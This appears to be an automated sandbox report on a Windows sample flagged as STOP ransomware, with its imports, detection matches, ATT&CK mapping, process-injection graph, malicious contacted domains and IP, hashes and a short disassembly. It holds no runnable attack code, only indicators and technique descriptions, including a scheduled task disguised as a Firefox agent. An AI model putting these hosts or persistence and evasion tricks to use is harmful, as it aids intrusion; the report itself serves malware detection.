              Source: explorer.exe, 00000002.00000000.281790475.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\file.exeCode function: GetComboBoxInfo,SetLastError,EnumTimeFormatsA,FindNextFileW,EnumCalendarInfoW,VerifyVersionInfoA,EnumTimeFormatsA,InterlockedDecrement,GetLongPathNameW,WaitForSingleObject,QueryMemoryResourceNotification,GetUserDefaultLangID,WritePrivateProfileStringA,AddRefActCtx,MoveFileWithProgressA,DeleteVolumeMountPointA,DeleteVolumeMountPointA,CreateActCtxA,EnumTimeFormatsA,_hwrite,SetHandleInformation,EnumResourceLanguagesA,CreateNamedPipeA,GetCurrentProcessId,GetComputerNameA,GetLocaleInfoW,HeapAlloc,GetModuleHandleW,SetVolumeMountPointW,FindResourceW,DeleteVolumeMountPointA,GetConsoleAliasesLengthA,LoadLibraryA,LoadLibraryA,GlobalFlags,WritePrivateProfileSectionA,GetConsoleAliasW,SetConsoleCursorInfo,GetProfileSectionA,LoadLibraryA,GetLastError,EndUpdateResourceA,GetModuleHandleW,FreeConsole,FindResourceW,SearchPathA,GetConsoleTitleA,OpenMutexW,GetUserDefaultLangID,InterlockedExchange,GetBinaryTypeW,GetCommandLineW,0_2_00404BB9
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,DebugActiveProcessStop,WriteConsoleOutputAttribute,FreeUserPhysicalPages,GetProcessId,ReadConsoleInputA,WaitForMultipleObjects,LocalSize,CreateDirectoryExA,FindFirstVolumeMountPointW,WriteFile,ClearCommBreak,WriteConsoleInputA,FindActCtxSectionStringA,CreateFileA,0_2_004045DF
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_00415238
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404BB9 GetComboBoxInfo,SetLastError,EnumTimeFormatsA,FindNextFileW,EnumCalendarInfoW,VerifyVersionInfoA,EnumTimeFormatsA,InterlockedDecrement,GetLongPathNameW,WaitForSingleObject,QueryMemoryResourceNotification,GetUserDefaultLangID,WritePrivateProfileStringA,AddRefActCtx,MoveFileWithProgressA,DeleteVolumeMountPointA,DeleteVolumeMountPointA,CreateActCtxA,EnumTimeFormatsA,_hwrite,SetHandleInformation,EnumResourceLanguagesA,CreateNamedPipeA,GetCurrentProcessId,GetComputerNameA,GetLocaleInfoW,HeapAlloc,GetModuleHandleW,SetVolumeMountPointW,FindResourceW,DeleteVolumeMountPointA,GetConsoleAliasesLengthA,LoadLibraryA,LoadLibraryA,GlobalFlags,WritePrivateProfileSectionA,GetConsoleAliasW,SetConsoleCursorInfo,GetProfileSectionA,LoadLibraryA,GetLastError,EndUpdateResourceA,GetModuleHandleW,FreeConsole,FindResourceW,SearchPathA,GetConsoleTitleA,OpenMutexW,GetUserDefaultLangID,InterlockedExchange,GetBinaryTypeW,GetCommandLineW,0_2_00404BB9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D77B GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0040D77B

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 0.2.file.exe.5815a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.vhefigi.7d15a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.vhefigi.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.318591413.0000000002051000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.318398880.0000000000580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.398871259.0000000002070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.398929809.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 0.2.file.exe.5815a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.vhefigi.7d15a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.vhefigi.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.318591413.0000000002051000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.318398880.0000000000580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.398871259.0000000002070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.398929809.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts3
              Native API
              1
              DLL Side-Loading
              313
              Process Injection
              11
              Masquerading
              1
              Input Capture
              1
              System Time Discovery
              Remote Services1
              Input Capture
              Exfiltration Over Other Network Medium1
              Encrypted Channel
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts1
              Exploitation for Client Execution
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              12
              Virtualization/Sandbox Evasion
              LSASS Memory321
              Security Software Discovery
              Remote Desktop Protocol1
              Archive Collected Data
              Exfiltration Over Bluetooth2
              Non-Application Layer Protocol
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)313
              Process Injection
              Security Account Manager12
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration112
              Application Layer Protocol
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
              Deobfuscate/Decode Files or Information
              NTDS3
              Process Discovery
              Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Hidden Files and Directories
              LSA Secrets1
              Application Window Discovery
              SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common2
              Obfuscated Files or Information
              Cached Domain Credentials1
              Remote System Discovery
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items1
              Software Packing
              DCSync1
              File and Directory Discovery
              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc Filesystem13
              System Information Discovery
              Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
              File Deletion
              /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 800803 Sample: file.exe Startdate: 07/02/2023 Architecture: WINDOWS Score: 100 32 Multi AV Scanner detection for domain / URL 2->32 34 Malicious sample detected (through community Yara rule) 2->34 36 Antivirus detection for URL or domain 2->36 38 4 other signatures 2->38 7 file.exe 2->7         started        10 vhefigi 2->10         started        process3 signatures4 48 Detected unpacking (changes PE section rights) 7->48 12 file.exe 7->12         started        50 Multi AV Scanner detection for dropped file 10->50 52 Machine Learning detection for dropped file 10->52 15 vhefigi 10->15         started        process5 signatures6 54 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 12->54 56 Maps a DLL or memory area into another process 12->56 58 Checks if the current machine is a virtual machine (disk enumeration) 12->58 17 explorer.exe 3 8 12->17 injected 60 Creates a thread in another existing process (thread injection) 15->60 process7 dnsIp8 26 host-file-host6.com 185.246.221.63, 49722, 80 LVLT-10753US Germany 17->26 28 host-host-file8.com 17->28 30 192.168.2.1 unknown unknown 17->30 22 C:\Users\user\AppData\Roaming\vhefigi, PE32 17->22 dropped 24 C:\Users\user\...\vhefigi:Zone.Identifier, ASCII 17->24 dropped 40 System process connects to network (likely due to code injection or exploit) 17->40 42 Benign windows process drops PE files 17->42 44 Deletes itself after installation 17->44 46 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->46 file9 signatures10

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              file.exe46%ReversingLabsWin32.Ransomware.Stop
              file.exe36%VirustotalBrowse
              file.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\vhefigi100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\vhefigi46%ReversingLabsWin32.Ransomware.Stop
              C:\Users\user\AppData\Roaming\vhefigi36%VirustotalBrowse
              SourceDetectionScannerLabelLinkDownload
              12.2.vhefigi.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.2.file.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              0.2.file.exe.5815a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              11.2.vhefigi.7d15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              SourceDetectionScannerLabelLink
              host-file-host6.com18%VirustotalBrowse
              host-host-file8.com18%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://host-file-host6.com/0%URL Reputationsafe
              http://host-host-file8.com/100%URL Reputationmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              host-file-host6.com
              185.246.221.63
              truetrueunknown
              host-host-file8.com
              unknown
              unknowntrueunknown
              NameMaliciousAntivirus DetectionReputation
              http://host-file-host6.com/true
              • URL Reputation: safe
              unknown
              http://host-host-file8.com/true
              • URL Reputation: malware
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              185.246.221.63
              host-file-host6.comGermany
              10753LVLT-10753UStrue
              IP
              192.168.2.1
              Joe Sandbox Version:36.0.0 Rainbow Opal
              Analysis ID:800803
              Start date and time:2023-02-07 20:03:12 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 8m 31s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:14
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:1
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:file.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@6/2@4/2
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 99.8% (good quality ratio 91.6%)
              • Quality average: 71.9%
              • Quality standard deviation: 31.9%
              HCA Information:
              • Successful, ratio: 98%
              • Number of executed functions: 18
              • Number of non-executed functions: 21
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, login.live.com, ctldl.windowsupdate.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              TimeTypeDescription
              20:05:07API Interceptor475x Sleep call for process: explorer.exe modified
              20:05:41Task SchedulerRun new task: Firefox Default Browser Agent E85BC7988C711DBE path: C:\Users\user\AppData\Roaming\vhefigi
              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              185.246.221.63file.exeGet hashmaliciousBrowse
              • host-file-host6.com/
              file.exeGet hashmaliciousBrowse
              • host-file-host6.com/
              file.exeGet hashmaliciousBrowse
              • host-file-host6.com/
              file.exeGet hashmaliciousBrowse
              • host-file-host6.com/
              file.exeGet hashmaliciousBrowse
              • host-file-host6.com/
              file.exeGet hashmaliciousBrowse
              • host-file-host6.com/
              file.exeGet hashmaliciousBrowse
              • host-file-host6.com/
              file.exeGet hashmaliciousBrowse
              • host-file-host6.com/
              file.exeGet hashmaliciousBrowse
              • host-file-host6.com/
              file.exeGet hashmaliciousBrowse
              • host-file-host6.com/
              file.exeGet hashmaliciousBrowse
              • host-file-host6.com/
              file.exeGet hashmaliciousBrowse
              • host-file-host6.com/
              file.exeGet hashmaliciousBrowse
              • host-file-host6.com/
              file.exeGet hashmaliciousBrowse
              • host-file-host6.com/
              file.exeGet hashmaliciousBrowse
              • host-file-host6.com/
              file.exeGet hashmaliciousBrowse
              • host-file-host6.com/
              file.exeGet hashmaliciousBrowse
              • host-file-host6.com/
              file.exeGet hashmaliciousBrowse
              • host-file-host6.com/
              file.exeGet hashmaliciousBrowse
              • host-file-host6.com/
              file.exeGet hashmaliciousBrowse
              • host-file-host6.com/
              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              host-file-host6.comfile.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              LVLT-10753USCompiled.xlsxGet hashmaliciousBrowse
              • 185.246.220.33
              https://4nu46.app.link/3ljjXIsWaxbGet hashmaliciousBrowse
              • 185.246.221.60
              EDD.exeGet hashmaliciousBrowse
              • 194.180.49.19
              25b1FT9ZdT.exeGet hashmaliciousBrowse
              • 45.81.39.147
              v9Lyz1CSRI.exeGet hashmaliciousBrowse
              • 45.81.39.147
              IN-001.docGet hashmaliciousBrowse
              • 185.246.220.85
              https://1drv.ms/w/s!Ar9DfDwqlsxsgQM6UjAimXPT7IogGet hashmaliciousBrowse
              • 185.246.221.60
              https://j43eb.app.link/FYAHdLYWaxbGet hashmaliciousBrowse
              • 185.246.221.60
              https://bit.ly/3DGpBI1Get hashmaliciousBrowse
              • 185.246.221.60
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              file.exeGet hashmaliciousBrowse
              • 185.246.221.63
              No context
              No context
              Process:C:\Windows\explorer.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):198144
              Entropy (8bit):7.034848311694385
              Encrypted:false
              SSDEEP:3072:BJoObqrFdq4LsfErWQ5vk/HqHA0KK1HYRkqPSM3Fa59NhVwgy:BJoDa4LXrxk/cA0/FYeSLFU9Ncg
              MD5:04A988E37B8EA5FACD28A7D42764F597
              SHA1:1182F9D0DE33E9363C7777F3F76D26C179A856E6
              SHA-256:7B734ABB20157CA48892547A61F80013138E9659B0942895991A9AB49FDADF79
              SHA-512:24519302727DCDBB5B020FEB1729980E0602409A205534B4577461E321C95A54A872026809C50C75D04B3B6C112D4E761381E11197F4AC11F106F0165779F252
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 46%
              • Antivirus: Virustotal, Detection: 36%, Browse
              Reputation:low
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................B.s.....p.....f..............w...a.....q.....t....Rich...........PE..L...8}.a.....................<......or............@.........................................................................l...P...................................@...............................p9..@............................................text............................... ..`.data............6..................@....rsrc............ ..................@..@.reloc..n'.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\explorer.exe
              File Type:ASCII text, with CRLF line terminators
              Category:modified
              Size (bytes):26
              Entropy (8bit):3.95006375643621
              Encrypted:false
              SSDEEP:3:ggPYV:rPYV
              MD5:187F488E27DB4AF347237FE461A079AD
              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
              Malicious:true
              Reputation:high, very likely benign file
              Preview:[ZoneTransfer]....ZoneId=0
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):7.034848311694385
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:file.exe
              File size:198144
              MD5:04a988e37b8ea5facd28a7d42764f597
              SHA1:1182f9d0de33e9363c7777f3f76d26c179a856e6
              SHA256:7b734abb20157ca48892547a61f80013138e9659b0942895991a9ab49fdadf79
              SHA512:24519302727dcdbb5b020feb1729980e0602409a205534b4577461e321c95a54a872026809c50c75d04b3b6c112d4e761381e11197f4ac11f106f0165779f252
              SSDEEP:3072:BJoObqrFdq4LsfErWQ5vk/HqHA0KK1HYRkqPSM3Fa59NhVwgy:BJoDa4LXrxk/cA0/FYeSLFU9Ncg
              TLSH:DF14C0223980F372C06B25705874DBA53FFEB5309175895B7BA917AE4F302D2663A387
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................B.s.......p.......f.................w.....a.......q.......t.....Rich............PE..L...8}.a...................
              Icon Hash:70d0eeeacacaeadd
              Entrypoint:0x40726f
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:TERMINAL_SERVER_AWARE
              Time Stamp:0x611A7D38 [Mon Aug 16 14:59:04 2021 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:0
              File Version Major:5
              File Version Minor:0
              Subsystem Version Major:5
              Subsystem Version Minor:0
              Import Hash:87e1f4e32d01d5a52e605f27fd138118
              Instruction
              call 00007F1340BE4E4Ch
              jmp 00007F1340BDE7BEh
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              mov ecx, dword ptr [esp+04h]
              test ecx, 00000003h
              je 00007F1340BDE966h
              mov al, byte ptr [ecx]
              add ecx, 01h
              test al, al
              je 00007F1340BDE990h
              test ecx, 00000003h
              jne 00007F1340BDE931h
              add eax, 00000000h
              lea esp, dword ptr [esp+00000000h]
              lea esp, dword ptr [esp+00000000h]
              mov eax, dword ptr [ecx]
              mov edx, 7EFEFEFFh
              add edx, eax
              xor eax, FFFFFFFFh
              xor eax, edx
              add ecx, 04h
              test eax, 81010100h
              je 00007F1340BDE92Ah
              mov eax, dword ptr [ecx-04h]
              test al, al
              je 00007F1340BDE974h
              test ah, ah
              je 00007F1340BDE966h
              test eax, 00FF0000h
              je 00007F1340BDE955h
              test eax, FF000000h
              je 00007F1340BDE944h
              jmp 00007F1340BDE90Fh
              lea eax, dword ptr [ecx-01h]
              mov ecx, dword ptr [esp+04h]
              sub eax, ecx
              ret
              lea eax, dword ptr [ecx-02h]
              mov ecx, dword ptr [esp+04h]
              sub eax, ecx
              ret
              lea eax, dword ptr [ecx-03h]
              mov ecx, dword ptr [esp+04h]
              sub eax, ecx
              ret
              lea eax, dword ptr [ecx-04h]
              mov ecx, dword ptr [esp+04h]
              sub eax, ecx
              ret
              cmp ecx, dword ptr [0042C190h]
              jne 00007F1340BDE944h
              rep ret
              jmp 00007F1340BE4E3Ch
              push eax
              push dword ptr fs:[00000000h]
              lea eax, dword ptr [esp+0Ch]
              sub esp, dword ptr [esp+0Ch]
              push ebx
              push esi
              push edi
              mov dword ptr [eax], ebp
              mov ebp, eax
              mov eax, dword ptr [0042C190h]
              Programming Language:
              • [ASM] VS2008 build 21022
              • [ C ] VS2008 build 21022
              • [IMP] VS2005 build 50727
              • [C++] VS2008 build 21022
              • [RES] VS2008 build 21022
              • [LNK] VS2008 build 21022
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x1876c0x50.text
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x15a0000x1ee8.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x15c0000xf1c.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x12400x1c.text
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39700x40.text
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x10000x1f4.text
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x1831a0x18400False0.5321560889175257data6.371835638411856IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .data0x1a0000x13f2900x13600False0.9425277217741935data7.833380745851634IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x15a0000x1ee80x2000False0.60888671875data5.786997654811944IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0x15c0000x276e0x2800False0.32099609375data3.3385866771832506IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              NameRVASizeTypeLanguageCountry
              RT_ICON0x15a1c00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TibetanTibet
              RT_ICON0x15a1c00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TibetanNepal
              RT_ICON0x15a1c00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TibetanIndia
              RT_ICON0x15aa680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TibetanTibet
              RT_ICON0x15aa680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TibetanNepal
              RT_ICON0x15aa680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TibetanIndia
              RT_STRING0x15bd900x4edataTibetanTibet
              RT_STRING0x15bd900x4edataTibetanNepal
              RT_STRING0x15bd900x4edataTibetanIndia
              RT_STRING0x15bde00x50dataTibetanTibet
              RT_STRING0x15bde00x50dataTibetanNepal
              RT_STRING0x15bde00x50dataTibetanIndia
              RT_STRING0x15be300xb6dataTibetanTibet
              RT_STRING0x15be300xb6dataTibetanNepal
              RT_STRING0x15be300xb6dataTibetanIndia
              RT_GROUP_ICON0x15bb100x22dataTibetanTibet
              RT_GROUP_ICON0x15bb100x22dataTibetanNepal
              RT_GROUP_ICON0x15bb100x22dataTibetanIndia
              RT_VERSION0x15bb380x258data
              DLLImport
              KERNEL32.dllRequestWakeupLatency, CreateFileA, FindActCtxSectionStringA, WriteConsoleInputA, ClearCommBreak, WriteFile, FindFirstVolumeMountPointW, CreateDirectoryExA, LocalSize, WaitForMultipleObjects, ReadConsoleInputA, GetProcessId, FreeUserPhysicalPages, WriteConsoleOutputAttribute, DebugActiveProcessStop, GetLocaleInfoW, GetProcAddress, LocalAlloc, GetCommandLineW, GetBinaryTypeW, InterlockedExchange, OpenMutexW, GetConsoleTitleA, SearchPathA, FreeConsole, EndUpdateResourceA, GetLastError, GetProfileSectionA, SetConsoleCursorInfo, GetConsoleAliasW, CreateSemaphoreA, GlobalFlags, GetConsoleAliasesLengthA, FindResourceW, SetVolumeMountPointW, GetModuleHandleW, HeapAlloc, GetComputerNameA, GetCurrentProcessId, CreateNamedPipeA, EnumResourceLanguagesA, SetHandleInformation, _hwrite, CreateActCtxA, DeleteVolumeMountPointA, MoveFileWithProgressA, AddRefActCtx, WritePrivateProfileStringA, GetUserDefaultLangID, QueryMemoryResourceNotification, WaitForSingleObject, GetLongPathNameW, InterlockedDecrement, VerifyVersionInfoA, EnumCalendarInfoW, FindNextFileW, EnumTimeFormatsA, SetLastError, SetCriticalSectionSpinCount, WritePrivateProfileSectionA, LoadLibraryA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RaiseException, RtlUnwind, HeapFree, DeleteFileA, GetStartupInfoW, GetModuleHandleA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, InitializeCriticalSectionAndSpinCount, WideCharToMultiByte, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle
              USER32.dllGetComboBoxInfo
              GDI32.dllGetTextFaceW
              Language of compilation systemCountry where language is spokenMap
              TibetanTibet
              TibetanNepal
              TibetanIndia
              TimestampSource PortDest PortSource IPDest IP
              Feb 7, 2023 20:05:06.676763058 CET4972280192.168.2.7185.246.221.63
              Feb 7, 2023 20:05:06.704660892 CET8049722185.246.221.63192.168.2.7
              Feb 7, 2023 20:05:06.704898119 CET4972280192.168.2.7185.246.221.63
              Feb 7, 2023 20:05:06.705308914 CET4972280192.168.2.7185.246.221.63
              Feb 7, 2023 20:05:06.705343962 CET4972280192.168.2.7185.246.221.63
              Feb 7, 2023 20:05:06.741307020 CET8049722185.246.221.63192.168.2.7
              Feb 7, 2023 20:05:06.850627899 CET8049722185.246.221.63192.168.2.7
              Feb 7, 2023 20:05:06.850774050 CET4972280192.168.2.7185.246.221.63
              Feb 7, 2023 20:05:06.852236986 CET4972280192.168.2.7185.246.221.63
              Feb 7, 2023 20:05:06.880031109 CET8049722185.246.221.63192.168.2.7
              TimestampSource PortDest PortSource IPDest IP
              Feb 7, 2023 20:05:06.647430897 CET5100753192.168.2.78.8.8.8
              Feb 7, 2023 20:05:06.667443037 CET53510078.8.8.8192.168.2.7
              Feb 7, 2023 20:05:06.864218950 CET5051353192.168.2.78.8.8.8
              Feb 7, 2023 20:05:07.911704063 CET5051353192.168.2.78.8.8.8
